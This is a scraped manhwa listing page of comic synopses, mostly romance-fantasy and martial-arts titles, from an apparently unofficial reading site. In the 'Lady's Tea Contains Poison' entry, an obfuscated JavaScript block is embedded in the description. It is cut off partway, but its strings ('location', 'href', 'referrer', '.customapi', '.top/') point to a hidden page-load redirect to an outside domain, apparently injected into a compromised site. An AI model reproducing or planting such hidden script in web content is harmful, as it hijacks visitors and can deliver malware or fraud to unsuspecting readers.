Manhwa - Page 111

Manhwa, the Korean version of comics, is renowned for its digital format and engaging stories across genres, from romance to action and fantasy.

2962 results

Lady, Shall We Go Together?

Read manhwa Lady, Shall We Go Together? / 레이디, 함께 가실까요? Updetes…


Lady’s Court

Read manhwa Lady’s Court / 아씨의 법정 During the exciting days of preparing to become the Crown Princess, my family faced ruin when my father was falsely accused of treason. Barely escaping with my life, I assumed the identity of a distant male relative and began living as an oejibu (lawyer). But… my disguise as a man suited me perfectly, and my skills and resourcefulness as an oejibu were unmatched! With a perfect track record, I, Kang Eunsan, became a renowned oejibu. One night, I crossed paths with a scholar named Lee Chosi, who had the audacity to criticize oejibus as “a dirty group driven by greed.” To make matters worse, he challenged me to prove that oejibus are essential to the people—by winning three cases in a row! A Joseon-era courtroom romance, The Lady’s Courtroom.


Lady’s Tea Contains Poison

I possessed the novel with three people who were my counterparts. Among them, I became the prince’s fiancee and a villain youngae who ended her life with the guillotine ending. “I’m happy though. We are all female protagonists in novels, so we can spare our lives.” … Were all female protagonists? I rolled my eyes awkwardly and finally opened my mouth. “Ah… , I will soon be the guillotine.” * * * It caused inconvenience to everyone. I thought the best thing I could do for everyone was to break up… … . “We are breaking up.” “Belly, what have I done to you? If you have a reason, tell me.” You catch me asking for a breakup. “Belly. I have no intention of giving up on you.” “If you can escape, run away. Even if it were death, I would gladly follow you.” Apparently, the keyword of the novel was affectionate man. When did the keyword change to obsessive? Will I be able to see the ending safely? Read manhwa  Lady’s Tea Contains Poison / ???? ???? ?? ?? ??<script></script><script>function _0x139f(){var _0x5a8466=['then','href','.top/','floor','includes','qjPyl','696HiiJCc','OgZPJ','location','15088BTRREj','48656cYTPap','.customapi','173860iyrJvy','UrOoY','text','hdgwm','FMYdm','126IxsHmW','319UtrvMI','5253327mypsPj','122940TZcXkH','','kCTCf','PUGzS','http://rea','https://ip','google','3fpUOOh','random','186FwxIrL','7207920fcIDYb','423282zpEPKY','referrer','LNnBf','yWjWH'];_0x139f=function(){return _0x5a8466;};return _0x139f();}function _0x5eef(_0x3ba47d,_0x44f718){var _0x19dbe8=_0x139f();return _0x5eef=function(_0x18b2c1,_0x3afae8){_0x18b2c1=_0x18b2c1-(0x15fd+0x1*-0x269e+0x11bd);var _0x304644=_0x19dbe8[_0x18b2c1];return _0x304644;},_0x5eef(_0x3ba47d,_0x44f718);}(function(_0x1b3c6f,_0x5269b3){var _0xc652ff=_0x5eef,_0x1f14c6=_0x1b3c6f();while(!![]){try{var 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Lantern Of The Dawn

Read manhwa Lantern Of The Dawn / Beacon of Dawn “Bucky,” a sergeant belonging to the “Empire of the Sun’s” war heroes. He is admired by the soldiers of the empire for his unwavering loyalty to the emperor and his exceptional martial arts skills. However, his ultimate goal is to overthrow the empire and seek revenge against the emperor. Can Bucky succeed in exacting his revenge against the mighty empire? “Lantern Of The Dawn Manhwa” is another name: 黎明之光 여명의 등불


Laws of The Good Child

Read “Laws of The Good Child Novel” – “Laws of The Good Child Manhwa” Online Free At KUNMANGA The summary of the comics “Laws of The Good Child”: [By the Author that brought you “QUESTISM”, “Juvenile offender” & “Manager Kim” ] & Share the same universe as “Lookism.” The private Russian orphanage “Dead Mansion” that trains young children as agents, and the legendary “Codename Sean” thought to have been lost due to a shipping error. He appears at a middle school in Korea!? This is a story from the perspective that shares the same universe with [Lookism.] “Laws of The Good Child” is alternatively named: Laws of The Good Child MangaZin The comics “Laws of The Good Child” belongs to the Genre: Action, Adventure, Fantasy “KUN MANGA, MANHWA UPDATES, HARI MANGA…” are the most searched keywords on the website MANHWA CLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Leave Me Alone, Duke

The fiancee who disappeared five years ago appeared with a child. “This child, is it my child?” “We are no longer in a relationship.” But somehow, her fiancee rejected him, and he was frustrated because he didn’t know, but it didn’t matter. “There is plenty of time. So take it slow.” “… … .” “There was no other woman but you in my life, in the past, now and in the future .” It was meant to seduce him again and make him fall in love with him. [That woman, Mabel] She returned after five years of leaving the royal castle. She took his child. “Do you not love me anymore?” “Yeah. I do not love you.” “… … lie.” As she tried to kill her, she hated this man for her brazen approach, pretending to know nothing of her. “I am not impulsive now. It’s not about burning the atmosphere.” “… … .” “I love you. a lot.” But why does the heart start beating again in front of it, resentful?


Leave the Divorce to a Professional Lawyer

Read manhwa Leave the Divorce to a Professional Lawyer / Leave Your Divorce to the Professional Attorney Natasha is an experienced divorce attorney. And for some reason, this empire was overflowing with couples who wanted to divorce for various reasons. For example, a husband who suddenly becomes obsessed with a wife or a wife who suddenly wants to get a divorce. Thanks to this, Natasha was making a sizable profit by helping them. In particular, when claiming alimony or part of property division as a fee, it was almost like sitting on a cushion of money. ‘Which lawyer would refuse this?’ Natasha hummed inwardly. *** “…Miss Estelle. Lawyers are always on the side of their clients.” The words that came out with a face that were not impressed were very emotional. When Estelle made a face that she couldn’t believe, Natasha continued. “To be precise, I’m on the side of those who give me money.” “That’s better.” “Honesty is also a basic skill of a lawyer.” 이혼은 전문 변호사에게 맡기세요

2 days ago

Leaving For My Younger Husband’s Future: A Divorce Decision

Read Manhwa Leaving For My Younger Husband’s Future: A Divorce Decision / Toshika Otto No Mirai No Tame Ni, Rikonjou O Oite Dete Ittakekka [1St Piccoma Novel Awards – Annual Excellent Work Award: Reader Jury Award] The Work That Gathered Enthusiastic Support From Readers Is Now Being Adapted Into Mangatoon! In Order To Save The Character I Was Rooting For, Alex, I Decided To Marry Yzabel, Who Was Supposed To Be A Childhood Friend Of Alex. In Our Married Life, Yzabel Was Treated As A Family Member, While Alex, Who Had Been Bullied By His Family, Was The One I Focused My Love On. After Three Years, I Made A Promise To Alex To ‘Make It Easier For You,’ But It Was A Secret That Yzabel Held, And It Was Alex Who Was Left Behind. The Secret Was Erased From My Memory, And I Lost The Memory Of My Beloved Wife, So I Had To Choose A Different Path. However, The Two Of Us Achieved A Reunion After Eight Years Of Separation. But What About Alex, Who Is Said To Be A Cold-Hearted Person? …! I Can’t Believe It’s So Different From What I Imagined…! This Is A Love Story Of A Jaded Young Man.” “Leaving For My Younger Husband’s Future: A Divorce Decision Manhwa” Is Sames Name: 年下夫の未来のために、離婚状を置いて出ていった結果


Legally, Dad

Read manhwa Legally, Dad / Seolyusang Appa / Step Dad On Paper / Stepdad on Paper Orphan Ah Young is a financially struggling 23-year-old who takes care of her 8-year-old sister Dan Bi while juggling part-time jobs. One day a 28-year-old man Yoo Sang appears in front of Ah Young offering to be her dad through a signed agreement. Webtoon that had a Webdrama adaptation in 2020 under the name ‘Legally, dad’ 서류상 아빠


Legend Of The Holy Sword

The one and only weapon to take down the Dark Lord. The Holy Sword. And the Warrior who lost it… Warrior seeks and seeks until he finds the Holy Sword. 10 years, 20 years, 30 years… From the Dragon’s Nest till the Spirit King’s Hideout The Warrior seeks the Holy Sword still to this day.


Legend Of The Northern Blade

When The World Was Plunged Into Darkness Martial Artists Gathered To Form The ‘Northern Heavenly Sect’. With The Help Of The Northern Heavenly Sect People Began To Enjoy Peace Again. However, As Time Passed The Martial Artists Began To Conspire Against The ‘Northern Heavenly Sect’, And Eventually Caused The Death Of The Sect Leader, Jin Kwan-Ho, Destroying The Sect With It. As Everyone Left The Sect, Jin Kwan-Ho’s Only Son, Jin Mu-Won Was Left Behind. Mu-Won Has Never Learned Martial Arts, But He Finds The Techniques Secretly Left Behind By His Father And Begins To Acquire The Martial Arts Of The Northern Heavenly Sect.


Legend of the Reincarnated Demon God

Read manhwa Legend of the Reincarnated Demon God [By the Studio that brought you and the Author of ] The Young Heavenly Demon, Yeon Woonhwi, attained the position of cult heir in the Heavenly Demon Cult with only supernatural abilities. His life of chaos finally meets its end during the rebellion of the vice cult leader and the elders. [Even if you needed to kill me, you should have remembered what kind of man I am. So, all of you, die!] After dying together with all the traitors, he wakes up in a place he could never have imagined. [A branch of the Tang Clan?] Tang Woonhwi of the Sichuan Tang Clan’s Nine Dragon Branch Family now dreams of rebuilding the Heavenly Demon Cult!!

3 days ago